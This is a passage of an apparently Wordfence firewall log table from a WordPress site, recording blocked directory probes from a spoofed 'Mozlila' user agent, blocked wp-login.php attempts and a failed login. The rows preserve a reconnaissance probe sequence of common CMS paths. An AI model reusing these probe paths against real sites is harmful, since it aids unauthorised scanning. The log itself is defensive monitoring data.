Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15190,1704857947.184414,1704857947.106100,'\0\0\0\0\0\0\0\0\0\0[\\',0,503,0,0,0,'https://tummyrevolution.com/wp-login.php',NULL,'Mozilla/5.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(15255,1704880007.233230,1704880007.126400,'\0\0\0\0\0\0\0\0\0\0^@w',0,403,0,0,0,'https://tummyrevolution.com/wp-includes/random_compat/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL3JhbmRvbV9jb21wYXQv\",\"category\":\"brute-force\",\"ssl\":1}'),(15256,1704879983.381183,1704879983.270400,'\0\0\0\0\0\0\0\0\0\0^@w',0,403,0,0,0,'https://tummyrevolution.com/wp-includes/Text/Diff/Engine/Engine/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1RleHQvRGlmZi9FbmdpbmUvRW5naW5lLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(15257,1704879978.114616,1704879978.003200,'\0\0\0\0\0\0\0\0\0\0^@w',0,403,0,0,0,'https://tummyrevolution.com/wp-includes/Requests/Auth/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1JlcXVlc3RzL0F1dGgv\",\"category\":\"brute-force\",\"ssl\":1}'),(15258,1704879974.702977,1704879974.602100,'\0\0\0\0\0\0\0\0\0\0^@w',0,403,0,0,0,'https://tummyrevolution.com/wp-includes/Requests/Exception/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1JlcXVlc3RzL0V4Y2VwdGlvbi8=\",\"category\":\"brute-force\",\"ssl\":1}'),(15259,1704879971.382593,1704879971.310000,'\0\0\0\0\0\0\0\0\0\0^@w',0,403,0,0,0,'https://tummyrevolution.com/wp-includes/images/wlw/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2ltYWdlcy93bHcv\",\"category\":\"brute-force\",\"ssl\":1}'),(15260,1704879963.269014,1704879963.164600,'\0\0\0\0\0\0\0\0\0\0^@w',0,403,0,0,0,'https://tummyrevolution.com/wp-includes/Requests/Exception/HTTP/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1JlcXVlc3RzL0V4Y2VwdGlvbi9IVFRQLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(15261,1704879958.975074,1704879958.868400,'\0\0\0\0\0\0\0\0\0\0^@w',0,403,0,0,0,'https://tummyrevolution.com/wp-includes/Requests/Utility/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1JlcXVlc3RzL1V0aWxpdHkv\",\"category\":\"brute-force\",\"ssl\":1}'),(15262,1704879956.321764,1704879956.206000,'\0\0\0\0\0\0\0\0\0\0^@w',0,403,0,0,0,'https://tummyrevolution.com/wp-includes/Requests/Transport/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1JlcXVlc3RzL1RyYW5zcG9ydC8=\",\"category\":\"brute-force\",\"ssl\":1}'),(15263,1704879952.665475,1704879952.593100,'\0\0\0\0\0\0\0\0\0\0^@w',0,403,0,0,0,'https://tummyrevolution.com/wp-includes/Requests/Response/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1JlcXVlc3RzL1Jlc3BvbnNlLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(15264,1704879950.639353,1704879950.538700,'\0\0\0\0\0\0\0\0\0\0^@w',0,403,0,0,0,'https://tummyrevolution.com/wp-includes/Requests/Proxy/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1JlcXVlc3RzL1Byb3h5Lw==\",\"category\":\"brute-force\",\"ssl\":1}'),(15265,1704879947.341525,1704879947.244400,'\0\0\0\0\0\0\0\0\0\0^@w',0,403,0,0,0,'https://tummyrevolution.com/wp-includes/Requests/Cookie/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL1JlcXVlc3RzL0Nvb2tpZS8=\",\"category\":\"brute-force\",\"ssl\":1}'),(15266,1704879930.477467,1704879930.379800,'\0\0\0\0\0\0\0\0\0\0^@w',0,403,0,0,0,'https://tummyrevolution.com/wp-includes/blocks/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWluY2x1ZGVzL2Jsb2Nrcy8=\",\"category\":\"brute-force\",\"ssl\":1}'),(15301,0.000000,1704881966.582642,'\0\0\0\0\0\0\0\0\0\0k',0,200,0,1,0,'https://tummyrevolution.com/wp-login.php','','Mozilla/5.0 (iPhone; CPU iPhone OS 7_1_1 like Mac OS X) AppleWebKit/537.51.2 (KHTML, like Gecko) Version/7.0 Mobile/11D201 Safari/9537.53','loginFailValidUsername',NULL,NULL),(15267,1704879918.369162,1704879918.274500,'\0\0\0\0\0\0\0\0\0\0^@w',0,403,0,0,0,'https://tummyrevolution.com/php/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3BocC8=\",\"category\":\"brute-force\",\"ssl\":1}'),(15268,1704879916.195894,1704879916.117300,'\0\0\0\0\0\0\0\0\0\0^@w',0,403,0,0,0,'https://tummyrevolution.com/plugins/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3BsdWdpbnMv\",\"category\":\"brute-force\",\"ssl\":1}'),(15269,1704879914.363794,1704879914.279400,'\0\0\0\0\0\0\0\0\0\0^@w',0,403,0,0,0,'https://tummyrevolution.com/images/stories/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2ltYWdlcy9zdG9yaWVzLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(15270,1704879911.574804,1704879911.492700,'\0\0\0\0\0\0\0\0\0\0^@w',0,403,0,0,0,'https://tummyrevolution.com/Assets/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L0Fzc2V0cy8=\",\"category\":\"brute-force\",\"ssl\":1}'),(15271,1704879910.190862,1704879910.109600,'\0\0\0\0\0\0\0\0\0\0^@w',0,403,0,0,0,'https://tummyrevolution.com/include/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2luY2x1ZGUv\",\"category\":\"brute-force\",\"ssl\":1}'),(15272,1704879908.263724,1704879908.172600,'\0\0\0\0\0\0\0\0\0\0^@w',0,403,0,0,0,'https://tummyrevolution.com/admin/editor/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2FkbWluL2VkaXRvci8=\",\"category\":\"brute-force\",\"ssl\":1}'),(15273,1704879905.590542,1704879905.505900,'\0\0\0\0\0\0\0\0\0\0^@w',0,403,0,0,0,'https://tummyrevolution.com/files/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2ZpbGVzLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(15274,1704879904.443456,1704879904.284100,'\0\0\0\0\0\0\0\0\0\0^@w',0,403,0,0,0,'https://tummyrevolution.com/shop/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3Nob3Av\",\"category\":\"brute-force\",\"ssl\":1}'),(15275,1704879902.138501,1704879901.930800,'\0\0\0\0\0\0\0\0\0\0^@w',0,403,0,0,0,'https://tummyrevolution.com/template/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3RlbXBsYXRlLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(15276,1704879900.043747,1704879899.963300,'\0\0\0\0\0\0\0\0\0\0^@w',0,403,0,0,0,'https://tummyrevolution.com/system/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3N5c3RlbS8=\",\"category\":\"brute-force\",\"ssl\":1}'),(15277,1704879897.448443,1704879897.364500,'\0\0\0\0\0\0\0\0\0\0^@w',0,403,0,0,0,'https://tummyrevolution.com/Site/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L1NpdGUv\",\"category\":\"brute-force\",\"ssl\":1}'),(15278,1704879894.436106,1704879894.327300,'\0\0\0\0\0\0\0\0\0\0^@w',0,403,0,0,0,'https://tummyrevolution.com/modules/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L21vZHVsZXMv\",\"category\":\"brute-force\",\"ssl\":1}'),(15279,1704879892.914804,1704879892.839300,'\0\0\0\0\0\0\0\0\0\0^@w',0,403,0,0,0,'https://tummyrevolution.com/local/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2xvY2FsLw==\",\"category\":\"brute-force\",\"ssl\":1}'),(15280,1704879889.971208,1704879889.891200,'\0\0\0\0\0\0\0\0\0\0^@w',0,403,0,0,0,'https://tummyrevolution.com/vendor/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3ZlbmRvci8=\",\"category\":\"brute-force\",\"ssl\":1}'),(15281,1704879888.237948,1704879888.162900,'\0\0\0\0\0\0\0\0\0\0^@w',0,403,0,0,0,'https://tummyrevolution.com/Public/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L1B1YmxpYy8=\",\"category\":\"brute-force\",\"ssl\":1}'),(15282,1704879886.555991,1704879886.497000,'\0\0\0\0\0\0\0\0\0\0^@w',0,403,0,0,0,'https://tummyrevolution.com/assets/images/','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) 